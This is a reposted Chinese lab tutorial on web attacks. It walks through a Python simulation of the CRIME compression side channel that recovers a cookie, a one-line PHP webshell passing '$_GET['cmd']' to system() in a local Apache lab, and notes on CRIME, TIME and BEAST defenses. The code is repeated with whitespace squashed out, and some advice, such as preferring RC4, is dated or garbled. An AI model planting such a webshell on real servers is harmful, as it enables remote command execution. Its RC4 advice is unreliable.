0


web攻击

#!/usr/bin/python3
import string
import zlib
import sys
import random
  
charset = string.letters + string.digits
  
COOKIE = ''.join(random.choice(charset) for x in range(30))
  
HEADERS = ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret="+COOKIE+"\r\n"
           "Accept-Encoding: gzip,deflate,sdch\r\n"
           "Accept-Language: en-US,en;q=0.8\r\n"
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
           "\r\n")
BODY =    ("POST / HTTP/1.1\r\n"
           "Host: thebankserver.com\r\n"
           "Connection: keep-alive\r\n"
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
           "Accept: */*\r\n"
           "Referer: https://thebankserver.com/\r\n"
           "Cookie: secret=")
cookie = ""
  
def compress(data):
  
    c = zlib.compressobj()
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
def getposset(perchar,chars):
    posset = []
    baselen = len(compress(HEADERS+perchar))
    for i in chars:
        t = len(compress(HEADERS+ perchar+i))
        if (t<=baselen):
            posset += i
    return posset
def doguess():
    global cookie
    while len(cookie)<30:
        posset = getposset(BODY+cookie,charset)
        trun = 1
        tem_posset = posset
        while 1<len(posset):
            tem_body = BODY[trun:]
            posset = getposset(tem_body+cookie,tem_posset)
            trun = trun +1
        if len(posset)==0:
            return False
        cookie += posset[0]
        print (posset[0])
        return True
  
while BODY.find("\r\n")>=0:
    if not doguess():
        print ("(-)Changebody")
        BODY = BODY[BODY.find("\r\n") + 2:]
print ("(+)orign  cookie"+COOKIE)
print ("(+)Gotten cookie"+cookie)
文件存在
#!/usr/bin/python3 importstring importzlib importsys importrandom charset=string.letters+string.digits COOKIE=''.join(random.choice(charset)forxinrange(30)) HEADERS=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret="+COOKIE+"\r\n" "Accept-Encoding:gzip,deflate,sdch\r\n" "Accept-Language:en-US,en;q=0.8\r\n" "Accept-Charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" "\r\n") BODY=("POST/HTTP/1.1\r\n" "Host:thebankserver.com\r\n" "Connection:keep-alive\r\n" "User-Agent:Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.1(KHTML,likeGecko)Chrome/22.0.1207.1Safari/537.1\r\n" "Accept:*/*\r\n" "Referer:https://thebankserver.com/\r\n" "Cookie:secret=") cookie="" defcompress(data): c=zlib.compressobj() returnc.compress(data)+c.flush(zlib.Z_SYNC_FLUSH) defgetposset(perchar,chars): posset=[] baselen=len(compress(HEADERS+perchar)) foriinchars: t=len(compress(HEADERS+perchar+i)) if(t<=baselen): posset+=i returnposset defdoguess(): globalcookie whilelen(cookie)<30: posset=getposset(BODY+cookie,charset) trun=1 tem_posset=posset while1<len(posset): tem_body=BODY[trun:] posset=getposset(tem_body+cookie,tem_posset) trun=trun+1 iflen(posset)==0: returnFalse cookie+=posset[0] print(posset[0]) returnTrue whileBODY.find("\r\n")>=0: ifnotdoguess(): print("(-)Changebody") BODY=BODY[BODY.find("\r\n")+2:] print("(+)origncookie"+COOKIE) print("(+)Gottencookie"+cookie)
操作正确,评测通过!
  1. #!/usr/bin/python3
  2. import string
  3. import zlib
  4. import sys
  5. import random
  6. charset = string.letters + string.digits
  7. COOKIE = ''.join(random.choice(charset) for x in range(30))
  8. HEADERS = ("POST / HTTP/1.1\r\n"
  9. "Host: thebankserver.com\r\n"
  10. "Connection: keep-alive\r\n"
  11. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  12. "Accept: */*\r\n"
  13. "Referer: https://thebankserver.com/\r\n"
  14. "Cookie: secret="+COOKIE+"\r\n"
  15. "Accept-Encoding: gzip,deflate,sdch\r\n"
  16. "Accept-Language: en-US,en;q=0.8\r\n"
  17. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"
  18. "\r\n")
  19. BODY = ("POST / HTTP/1.1\r\n"
  20. "Host: thebankserver.com\r\n"
  21. "Connection: keep-alive\r\n"
  22. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
  23. "Accept: */*\r\n"
  24. "Referer: https://thebankserver.com/\r\n"
  25. "Cookie: secret=")
  26. cookie = ""
  27. def compress(data):
  28. c = zlib.compressobj()
  29. return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  30. def getposset(perchar,chars):
  31. posset = []
  32. baselen = len(compress(HEADERS+perchar))
  33. for i in chars:
  34. t = len(compress(HEADERS+ perchar+i))
  35. if (t<=baselen):
  36. posset += i
  37. return posset
  38. def doguess():
  39. global cookie
  40. while len(cookie)<30:
  41. posset = getposset(BODY+cookie,charset)
  42. trun = 1
  43. tem_posset = posset
  44. while 1<len(posset):
  45. tem_body = BODY[trun:]
  46. posset = getposset(tem_body+cookie,tem_posset)
  47. trun = trun +1
  48. if len(posset)==0:
  49. return False
  50. cookie += posset[0]
  51. print (posset[0])
  52. return True
  53. while BODY.find("\r\n")>=0:
  54. if not doguess():
  55. print ("(-)Changebody")
  56. BODY = BODY[BODY.find("\r\n") + 2:]
  57. print ("(+)orign cookie"+COOKIE)
  58. print ("(+)Gotten cookie"+cookie)

任务描述

本关任务:了解Webshell

相关知识

为了完成本关任务,你需要掌握:

1.Webshell

Webshell

本质上是放置在服务器上的脚本文件,由于其调用了操作系统的一些函数,于是拥有了与shell 类似的功能。

实验步骤

完成Webshell实验

实验步骤一,安装http服务器

更新软件源

  1. # apt-get update

安装apache http服务

  1. # apt-get install apache2

实验步骤二,安装php

  1. # apt-get install php
  2. # apt-get install libapache2-mod-php
  3. # vim /etc/php/7.0/apache2/php.ini
  4. allow_url_include = On
  5. # echo "ServerName localhost:80" >> /etc/apache2/apache2.conf

实验步骤三,创建一个简单的webshell界面

  1. # cd /root
  2. # touch test.php
  3. # echo '<?php system($_GET['cmd']);?>' >> test.php

实验步骤四,将页面复制到Web服务器当中

  1. # cp test.php /var/www/html
  2. # service apache2 restart

实验步骤五,使用浏览器进行浏览 在网址栏输入:

  1. http://127.0.0.1/test.php?cmd=ls

任务描述

本关任务:了解HTTPS攻击的方法

相关知识

为了完成本关任务,你需要掌握:

1.HTTPS攻击

HTTPS攻击
常见HTTPS攻击

1)CRIME攻击

攻击原理

​ 攻击者控制受害者发送大量请求,利用压缩算法的机制猜测请求中的关键信息,根据response长度判断请求是否成功。

攻击前提

​ 攻击者可以获取受害者的网络通信包。(中间人攻击,ISP供应商)

​ 浏览器和服务器支持均支持并使用压缩算法。

​ 攻击者可以控制受害者发送大量请求并可以控制请求内容。

防御方法

​ 客户端可以升级浏览器来避免这种攻击。

  1. • Chrome: 21.0.1180.89 and above
  2. • Firefox: 15.0.1 and above
  3. • Opera: 12.01 and above
  4. • Safari: 5.1.7 and above

​ 服务器端可以通过禁用一些加密算法来防止此类攻击。

​ Apache

  1. • SSLCompression flag = “SSLCompression off”
  2. • GnuTLSPriorities flag = “!COMP-DEFLATE"

​ 禁止过于频繁的请求。

​ 修改压缩算法流程,用户输入的数据不进行压缩。

​ 随机添加长度不定的垃圾数据。

2)TIME攻击

攻击原理

​ 攻击者控制受害者发送大量请求,利用压缩算法的机制猜测请求中的关键信息,根据response响应时间判断请求是否成功。其实TIME和CRIME一样都利用了压缩算法,只不过CRIME是通过长度信息作为辅助,而TIME是通过时间信息作为辅助。

攻击前提

​ 攻击者可以控制受害者发送大量请求并可以控制请求内容。

​ 稳定的网络环境。

防御方法

​ 在解密Response过程中加入随机的短时间延迟。

​ 阻止短时间内的频繁请求。

3)BEAST

攻击原理

​ 攻击者控制受害者发送大量请求,利用CBC加密模式猜测关键信息。

攻击前提

​ 攻击者可以获取受害者的网络通信包。(中间人攻击,ISP供应商)

​ 攻击者需要能得到发送敏感数据端的一部分权限。以便将自己的信息插入SSL/TLS会话中。

​ 攻击者需要准确的找出敏感数据的密文段。

​ 攻击这可以控制受害者发送大量请求并可以控制请求内容。

防御方法

​ 使用RC4加密模式代替BCB加密模式。

​ 部署TLS 1.1或者更高级的版本,来避免SSL 3.0/TLS 1.0带来的安全问题。

​ 在服务端设置每传输固定字节,就改变一次加密秘钥。

实验步骤

完成HTTPS攻击实验

Python利用CRIME思路验证攻击可行性

实验步骤一,进入Python交互模式:

  1. # cd /root
  2. # python3
  3. Python 3.6.9 (default, Jul 17 2020, 12:50:27)
  4. [GCC 8.4.0] on linux
  5. Type "help", "copyright", "credits" or "license" for more information.
  6. >>>

实验步骤二,导入模块:

  1. >>> import string
  2. >>> import zlib
  3. >>> import sys
  4. >>> import random

实验步骤三,定义字符集:

  1. >>> charset = string.ascii_letters + string.digits

实验步骤四,定义COOKIE:

  1. >>> COOKIE = ''.join(random.choice(charset) for x in range(30))

实验步骤五,定义头部信息:

HEADERS = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret="+COOKIE+"\r\n"
"Accept-Encoding: gzip,deflate,sdch\r\n"
"Accept-Language: en-US,en;q=0.8\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,
;q=0.3\r\n"
"\r\n")

实验步骤六,定义BODY:

实验步骤七,定义cookie:

BODY = ("POST / HTTP/1.1\r\n"
"Host: thebankserver.com\r\n"
"Connection: keep-alive\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"
"Accept: */*\r\n"
"Referer: https://thebankserver.com/\r\n"
"Cookie: secret=")

  1. >>> cookie = ""

实验步骤八,定义猜测方法:

  1. >>> def compress(data):
  2. ...
  3. ... c = zlib.compressobj()
  4. ... return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)
  5. >>> def getposset(perchar,chars):
  6. ... posset = []
  7. ... baselen = len(compress(HEADERS+perchar))
  8. ... for i in chars:
  9. ... t = len(compress(HEADERS+ perchar+i))
  10. ... if (t<=baselen):
  11. ... posset += i
  12. ... return posset
  13. >>> def doguess():
  14. ... global cookie
  15. ... while len(cookie)<30:
  16. ... posset = getposset(BODY+cookie,charset)
  17. ... trun = 1
  18. ... tem_posset = posset
  19. ... while 1<len(posset):
  20. ... tem_body = BODY[trun:]
  21. ... posset = getposset(tem_body+cookie,tem_posset)
  22. ... trun = trun +1
  23. ... if len(posset)==0:
  24. ... return False
  25. ... cookie += posset[0]
  26. ... print(posset[0])
  27. ... return True

实验步骤九,猜测循环体:

  1. >>> while BODY.find("\r\n")>=0:
  2. ... if not doguess():
  3. ... print ("(-)Changebody")
  4. ... BODY = BODY[BODY.find("\r\n") + 2:]

实验步骤十,编写输入代码:

  1. >>> print("(+)orign cookie"+COOKIE)
  2. >>> print("(+)Gotten cookie"+cookie)

实验步骤十一,将上述步骤编写为执行文件:

输入命令:

# vi /root/CRIME.py

输入内容:

  1. #!/usr/bin/python3

  2. import string

  3. import zlib

  4. import sys

  5. import random

  6. charset = string.letters + string.digits

  7. COOKIE = ''.join(random.choice(charset) for x in range(30))

  8. HEADERS = ("POST / HTTP/1.1\r\n"

  9. "Host: thebankserver.com\r\n"

  10. "Connection: keep-alive\r\n"

  11. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"

  12. "Accept: */*\r\n"

  13. "Referer: https://thebankserver.com/\r\n"

  14. "Cookie: secret="+COOKIE+"\r\n"

  15. "Accept-Encoding: gzip,deflate,sdch\r\n"

  16. "Accept-Language: en-US,en;q=0.8\r\n"

  17. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n"

  18. "\r\n")

  19. BODY = ("POST / HTTP/1.1\r\n"

  20. "Host: thebankserver.com\r\n"

  21. "Connection: keep-alive\r\n"

  22. "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n"

  23. "Accept: */*\r\n"

  24. "Referer: https://thebankserver.com/\r\n"

  25. "Cookie: secret=")

  26. cookie = ""

  27. def compress(data):

  28. c = zlib.compressobj()

  29. return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)

  30. def getposset(perchar,chars):

  31. posset = []

  32. baselen = len(compress(HEADERS+perchar))

  33. for i in chars:

  34. t = len(compress(HEADERS+ perchar+i))

  35. if (t<=baselen):

  36. posset += i

  37. return posset

  38. def doguess():

  39. global cookie

  40. while len(cookie)<30:

  41. posset = getposset(BODY+cookie,charset)

  42. trun = 1

  43. tem_posset = posset

  44. while 1<len(posset):

  45. tem_body = BODY[trun:]

  46. posset = getposset(tem_body+cookie,tem_posset)

  47. trun = trun +1

  48. if len(posset)==0:

  49. return False

  50. cookie += posset[0]

  51. print (posset[0])

  52. return True

  53. while BODY.find("\r\n")>=0:

  54. if not doguess():

  55. print ("(-)Changebody")

  56. BODY = BODY[BODY.find("\r\n") + 2:]

  57. print ("(+)orign cookie"+COOKIE)

  58. print ("(+)Gotten cookie"+cookie)

  59. # python CRIME.py

  60. B

  61. r

  62. Z

  63. c

  64. M

  65. 2

  66. l

  67. 4

  68. s

  69. 7

  70. (-)Changebody

  71. w

  72. F

  73. 9

  74. K

  75. 6

  76. 8

  77. E

  78. w

  79. E

  80. P

  81. t

  82. W

  83. a

  84. U

  85. (-)Changebody

  86. i

  87. E

  88. N

  89. 9

  90. r

  91. 1

  92. (-)Changebody

  93. (-)Changebody

  94. (-)Changebody

  95. (-)Changebody

  96. (+)orign cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1

  97. (+)Gotten cookieBrZcM2l4s7wF9K68EwEPtWaUiEN9r1

将结果保存到文件中:

  1. # python CRIME.py > /root/HTTPS.txt

任务:

完成实验。


开始你的任务吧,祝你成功!

标签: android

本文转载自: https://blog.csdn.net/daima3/article/details/138474050
版权归原作者 你若盛开,清风自来! 所有, 如有侵权,请联系我们删除。

“web攻击”的评论:

还没有评论